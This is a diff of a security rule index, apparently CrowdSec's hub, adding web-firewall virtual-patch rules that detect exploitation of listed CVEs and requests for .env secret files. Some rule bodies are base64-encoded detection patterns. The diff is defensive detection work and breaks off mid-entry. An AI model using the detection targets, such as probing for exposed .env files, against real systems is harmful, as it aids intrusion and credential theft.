+ "digest": "78803a49055ed71b353ddf43560d700d0b64ebfb172ef6705457f793a9f37b34",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "b155e9bbe64b4b44f3c98617c4b3bfedaadcce147e0685290e0d7a8dbdf47108",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2021-3129 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2021-3129",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-98"
+ ],
+ "confidence": 3,
+ "label": "Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-27926": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "d96237a7ed02eb7aa9df45a684b5cef8f5145e857d10b5260373739668ad63f5",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "ba56077560152e4dd0e06c1bc1e6522515142b0ea7a27dff2c0ea289ddaee174",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2022-27926 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-27926",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-79"
+ ],
+ "confidence": 3,
+ "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-35914": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "6a04ea781b27eb568a1752e3e310ef59532f803fed829010fb5cf76225454bc5",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "ef4c9225bcfcc942fa5db2568a99af628cf578249b4a7477e0889f16d3ef4111",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "e1213758c850424b37cb6ff6360fc1e1a2f12af9284d77766b06ee8c58679656",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2022-35914 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-35914",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-74"
+ ],
+ "confidence": 3,
+ "label": "GLPI \u003c=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-44877": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "3c6baf947b513098784bb4cb9d03c2e19483dd48a7660db55ee77872dd903132",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDQ4NzcKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItNDQ4NzcgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2xvZ2luL2luZGV4LnBocAogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgLSBsb2dpbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAiW15hLXpBLVowLTlfLi1dKyIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2VudE9TIFdlYiBQYW5lbCA3IFJDRSAoQ1ZFLTIwMjItNDQ4NzcpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyMi00NDg3NwogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtNzg=",
+ "description": "Detect CVE-2022-44877 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-44877",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-78"
+ ],
+ "confidence": 3,
+ "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-46169": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "e251805a453d65934e5794cbb96ce34179ce20981a123103d814afdcbb788d00",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "6d2c89d06aefeacf14816f1cc755365056efcdba79265a0bb587033ca5790962",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "00ad3b04df93d2ea077b69ecfcc1156ad0262005ab9915b740f6fb0c08fe86a1",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2022-46169 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-46169",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-74",
+ "cwe.CWE-77",
+ "cwe.CWE-78",
+ "cwe.CWE-863"
+ ],
+ "confidence": 3,
+ "label": "Cacti \u003c=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-20198": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "100fe7c75a8b557d6ad35bc8712b996d9366631dda64d8a72e245293773ef2ae",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "4ed8476a931d3b45b210669ccab401d736bc765cc21ea02ed8fbddc21e6598ca",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "eedd4555f876c459d0a17950f3b1311404b44d248b789221fddf73054e429bc0",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "4d5339081ffa687619f13b3480984e056f64cab397154c187470ef1144a5fed3",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-20198 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-20198",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-287"
+ ],
+ "confidence": 3,
+ "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-22515": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "dc6fc69ee52353cef3ea5563dbccd5b73dae0924e0bf13e38550768a23eeee8c",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "bf313622a8c6b00bdaf421bb0766c1a0d077aaff8db50c32c4b1090dbbbf0fb9",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "16d7f6ff1913304df2a270b3a27ba5d1165be8e3c7978489cfb9338875bb4d42",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-22515 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-22515",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-24489": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "c7ec7c49ee24ba7ba855e3ae256ec2d128b51c7771d676dc150aa3cc060ca785",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-24489 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-24489",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-33617": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "27d605f7f1aa991127741c047ca8c4af1e0113feafb2073fd9aa04793c311d6e",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "15df9e2f71f34f037f96f7a9b61e6cbab993f3de3708ee92cda32bec84412391",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "399c24c2222b455a5e9030ad0a31b58261e62724051655f7b98be4cdc8cc96d3",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-33617 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-33617",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-78"
+ ],
+ "confidence": 3,
+ "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-34362": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "b032c0e88f383ffb1228287b53f61443eb9c91db1cd730c4e10dd42bf44d86d9",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "be808170ee4c42540423351f6d188b8cd22899810357f188d404a61f07b64dc7",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "f579f526676ecaded1b1048503b9fd738144a67b2f7f0b14d6d770c35aa98cf6",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "1af2e304188e802a2aedc45557e41c2e6debac3d8246ec1e44d57f7d664c9677",
+ "deprecated": false
+ }
+ },
+ "content": "Cm5hbWU6IGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCmRlc2NyaXB0aW9uOiAiRGV0ZWN0IENWRS0yMDIzLTM0MzYyIGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiAvbW92ZWl0aXNhcGkvbW92ZWl0aXNhcGkuZGxsCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAtIGFjdGlvbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBlcXVhbHMKICAgICAgICB2YWx1ZTogbTIKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICd4LXNpbG9jay10cmFuc2FjdGlvbicKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAtIGxvd2VyY2FzZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAnLit4LXNpbG9jay10cmFuc2FjdGlvbicKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiTU9WRWl0IFRyYW5zZmVyIC0gUmVtb3RlIENvZGUgRXhlY3V0aW9uIChDVkUtMjAyMy0zNDM2MikiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTM0MzYyCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS04OQ==",
+ "description": "Detect CVE-2023-34362 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-34362",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-89"
+ ],
+ "confidence": 3,
+ "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-3519": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "459cd434b8da480eaa0bfbbefc9806ca8c445a64757cbd339f1f7b6b32082f6f",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "57441c54adbcb8cd88ba205b1f1358dfc10c1779662efe7e9854469b986c5f54",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-3519 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-3519",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-94"
+ ],
+ "confidence": 3,
+ "label": "Citrix RCE (CVE-2023-3519)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-38205": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "d2c3666c0a337304d92b737ca02ad1aed164e31439eb6596a848688f0c27b178",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-38205 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-38205",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-40044": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "2e8db7d8cb223e1cb1a57c4621b1720d88174c3398183948c8901645f78ee338",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "e49809530908e16a9628fece23d934be09d9756fc64f795d7311e70565a2f32e",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-40044 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-40044",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-502"
+ ],
+ "confidence": 3,
+ "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-42793": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "86fb6a193e9799612bf00b67894f7aabe4482f024a012f305b2cfa910384aa73",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-42793",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-42793",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-288"
+ ],
+ "confidence": 3,
+ "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-50164": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "2af3917de29ccf7f71d43b78502602568b2d4582769e62ffb9c195fcfab33e90",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "05c4eb4526d99bc0c9cbefbcc60e2fde6f93f5b0f41ea500565f791ae57ed67e",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2023-50164 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-50164",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-552"
+ ],
+ "confidence": 3,
+ "label": "Apache Struts2 (CVE-2023-50164)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-env-access": {
+ "path": "appsec-rules/crowdsecurity/vpatch-env-access.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "ae22c494fb05801bc4886564e63927ccc248be20b1d1dc31f1011a27a4d75cbe",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtZW52LWFjY2VzcwpkZXNjcmlwdGlvbjogIkRldGVjdCBhY2Nlc3MgdG8gLmVudiBmaWxlcyIKcnVsZXM6CiAgLSB6b25lczoKICAgIC0gVVJJCiAgICB0cmFuc2Zvcm06CiAgICAtIGxvd2VyY2FzZQogICAgbWF0Y2g6CiAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgIHZhbHVlOiAvLmVudgpsYWJlbHM6CiAgdHlwZTogc2NhbgogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOnNjYW4iCiAgbGFiZWw6ICJBY2Nlc3MgdG8gLmVudiBmaWxlIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAo=",
+ "description": "Detect access to .env files",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:scan",
+ "classification": [
+ "attack.T1595",
+ "attack.T1190"
+ ],
+ "confidence": 3,
+ "label": "Access to .env file",
+ "service": "http",
+ "spoofable": 0,
+ "type": "scan"
+ }
+ }
+ },
"collections": {
"Dominic-Wagner/vaultwarden": {
"path": "collections/Dominic-Wagner/vaultwarden.yml",
@@ -530,6 +1243,97 @@
"crowdsecurity/vsftpd"
]
},
+ "crowdsecurity/appsec-crs": {
+ "path": "collections/crowdsecurity/appsec-crs.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "61d5e358aa86b872300e540be39b066c278567c4948bb74d4e4f339bbb126154",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "7f56cb3fa217f983d1648e6aea36d399be444e09046c0b5b23e7eb55480eaf89",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+ "deprecated": false
+ }
+ },
+ "long_description": "IyBNb2RTZWN1cml0eSBDUlMKCg==",
+ "content": "cGFyc2VyczoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjLWxvZ3MKYXBwc2VjLWNvbmZpZ3M6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwpkZXNjcmlwdGlvbjogIkFwcHNlYzogTW9kc2VjdXJpdHkgY29yZSBydWxlIHNldCBydWxlcyIKYXV0aG9yOiBjcm93ZHNlY3VyaXR5CnRhZ3M6CiAgLSBsaW51eAogIC0gaHR0cAogIC0gYXBwc2VjCiAgLSBtb2RzZWN1cml0eQo=",
+ "description": "Appsec: Modsecurity core rule set rules",
+ "author": "crowdsecurity",
+ "labels": null,
+ "parsers": [
+ "crowdsecurity/appsec-logs"
+ ],
+ "appsec-rules": [
+ "crowdsecurity/crs"
+ ],
+ "appsec-configs": [
+ "crowdsecurity/crs"
+ ]
+ },
+ "crowdsecurity/appsec-virtual-patching": {
+ "path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "4bacd3307cc84a5498d0939c83df3eccf40f430d4eedbdc1f7e7ae1fb8b71676",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "28962f063f10702629018df810167378d8250185ab8d64f4f5d1454b14dd1d4f",
+ "deprecated": false
+ }
+ },
+ "long_description": "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",
+ "content": "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",
+ "description": "a generic virtual patching collection, suitable for most web servers.",
+ "author": "crowdsecurity",
+ "labels": null,
+ "parsers": [
+ "crowdsecurity/appsec-logs"
+ ],
+ "scenarios": [
+ "crowdsecurity/appsec-vpatch"
+ ],
+ "appsec-rules": [
+ "crowdsecurity/base-config",
+ "crowdsecurity/vpatch-env-access",
+ "crowdsecurity/vpatch-CVE-2023-40044",
+ "crowdsecurity/vpatch-CVE-2017-9841",
+ "crowdsecurity/vpatch-CVE-2020-11738",
+ "crowdsecurity/vpatch-CVE-2022-27926",
+ "crowdsecurity/vpatch-CVE-2022-35914",
+ "crowdsecurity/vpatch-CVE-2022-46169",
+ "crowdsecurity/vpatch-CVE-2023-20198",
+ "crowdsecurity/vpatch-CVE-2023-22515",
+ "crowdsecurity/vpatch-CVE-2023-33617",
+ "crowdsecurity/vpatch-CVE-2023-34362",
+ "crowdsecurity/vpatch-CVE-2023-3519",
+ "crowdsecurity/vpatch-CVE-2023-42793",
+ "crowdsecurity/vpatch-CVE-2023-50164",
+ "crowdsecurity/vpatch-CVE-2023-38205",
+ "crowdsecurity/vpatch-CVE-2023-24489",
+ "crowdsecurity/vpatch-CVE-2021-3129",
+ "crowdsecurity/vpatch-CVE-2021-22941",
+ "crowdsecurity/vpatch-CVE-2019-12989",
+ "crowdsecurity/vpatch-CVE-2022-44877"
+ ],
+ "appsec-configs": [
+ "crowdsecurity/virtual-patching"
+ ]
+ },
"crowdsecurity/asterisk": {
"path": "collections/crowdsecurity/asterisk.yaml",
"version": "0.1",
@@ -3206,6 +4010,37 @@
"author": "crowdsecurity",
"labels": null
},
+ "crowdsecurity/appsec-logs": {
+ "path": "parsers/s01-parse/crowdsecurity/appsec-logs.yaml",
+ "stage": "s01-parse",
+ "version": "0.5",
+ "versions": {
+ "0.1": {
+ "digest": "b6de996d25dcbbbda4889fea9e8b05559660c54ea2ed7202430741ef40141179",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "20fe00d38f9756169fb5d56027e5c26085e038f699a18d17be94ad6b0da14447",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "24ea66d28ee00e9bef266b86fc56ed9e7a95e8f36027765b99389f0b4ed8c2d3",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "60b45bc8957dfc40f270500b8ef438085294fc172c92332dcb9dcb3c14cc9c85",
+ "deprecated": false
+ },
+ "0.5": {
+ "digest": "e44f2877c363061fef239a9af472253900674bf261e8762febd06d7ef20022a0",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Parse Appsec events",
+ "author": "crowdsecurity",
+ "labels": null
+ },
"crowdsecurity/asterisk-logs": {
"path": "parsers/s01-parse/crowdsecurity/asterisk-logs.yaml",
"stage": "s01-parse",
@@ -3308,7 +4143,7 @@
"crowdsecurity/caddy-logs": {
"path": "parsers/s01-parse/crowdsecurity/caddy-logs.yaml",
"stage": "s01-parse",
- "version": "0.5",
+ "version": "0.6",
"versions": {
"0.1": {
"digest": "30bf81915d8254ab7611c156ddbe0cf389838d471f973403ae1b07fffa5b6d5a",
@@ -3329,10 +4164,14 @@
"0.5": {
"digest": "19673bb9a1ad806c7d615d24c37649f8c0679acb07df9ac304ba23d44eaf0f53",
"deprecated": false
+ },
+ "0.6": {
+ "digest": "856f9882c2aa89d701dce456e97bfb4c5230b7fc83cefc54a8279d7cdac5b8fe",
+ "deprecated": false
}
},
"long_description": "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",
- "content": "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",
+ "content": "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",
"description": "Parse caddy logs",
"author": "crowdsecurity",
"labels": null
@@ -4290,7 +5129,7 @@
"crowdsecurity/palo-alto-threat-log": {
"path": "parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml",
"stage": "s01-parse",
- "version": "0.2",
+ "version": "0.3",
"versions": {
"0.1": {
"digest": "7a9d62f00f202417325dcfac25efc34e5caaa78b469486977967ced0d0ec6cb1",
@@ -4299,10 +5138,14 @@
"0.2": {
"digest": "8e2ef39c33263f3b2bdca6e6936a61de1a84a4bc7ad741626b31b9f19d2304b7",
"deprecated": false
+ },
+ "0.3": {
+ "digest": "a2f3c15040301cdbbf75233c123d089be2380401de5f335b08275929a2f45974",
+ "deprecated": false
}
},
"long_description": "IyMgUGFsbyBBbHRvIFRocmVhdCBMb2cgUGFyc2VyCgoKUGFyc2UgUGFsbyBBbHRvIFRocmVhdCBMb2cuCk1vcmUgaW5mb3JtYXRpb24gaW4gW1BhbG8gQWx0byBEb2N1bWVudGF0aW9uXShodHRwczovL2RvY3MucGFsb2FsdG9uZXR3b3Jrcy5jb20vcGFuLW9zLzktMS9wYW4tb3MtYWRtaW4vbW9uaXRvcmluZy91c2Utc3lzbG9nLWZvci1tb25pdG9yaW5nL3N5c2xvZy1maWVsZC1kZXNjcmlwdGlvbnMvdGhyZWF0LWxvZy1maWVsZHMp",
- "content": "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",
+ "content": "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",
"description": "Parse palo-alto-threat-log logs",
"author": "crowdsecurity",
"labels": null
@@ -6945,6 +7788,38 @@
"spoofable": 0
}
},
+ "crowdsecurity/appsec-vpatch": {
+ "path": "scenarios/crowdsecurity/appsec-vpatch.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "6da853b06b3fb716d6094ebdf881df90d27239637ff3389b202b0077eda7acea",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "f43baacd1a6756c8d6c51f632ad52871708b4176d490d77975491fd1c55a8e3d",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "7e5f221a8a725d96df1ba2f6e32de34e02dc98abbb9598e72095ad0db94d6a13",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect appsec attacks",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "attack.T1110"
+ ],
+ "confidence": 3,
+ "label": "appsec blocked",
+ "remediation": true,
+ "service": "http",
+ "spoofable": 0
+ }
+ },
"crowdsecurity/asterisk_bf": {
"path": "scenarios/crowdsecurity/asterisk_bf.yaml",
"version": "0.2",
@@ -7935,6 +8810,63 @@
"spoofable": 0
}
},
+ "crowdsecurity/crowdsec-appsec-inband": {
+ "path": "scenarios/crowdsecurity/crowdsec-appsec-inband.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "bf202b09575fe406d17ff9cf267cfc81d228bc0575038a8ae91a137ed4405b58",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0d0bcfec8fb567aa86271f3e5c45feb16c6091f2c52c32db629117b0bba0e793",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "71213c8536a1e04b36fe2e207ffec099982e78cf7d3ed6a8ecd26440f47cb1c0",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "attack.T1190"
+ ],
+ "confidence": 3,
+ "label": "Triggered multiple inband CrowdSec appsec rules",
+ "remediation": true,
+ "service": "http",
+ "spoofable": 0
+ }
+ },
+ "crowdsecurity/crowdsec-appsec-outofband": {
+ "path": "scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "1e9a7f01a451b2322f1125b0dfba3c5cdd3dca53e69eb38f245a3e25af6952df",
+ "deprecated": false
+ },
+ "0.2": {
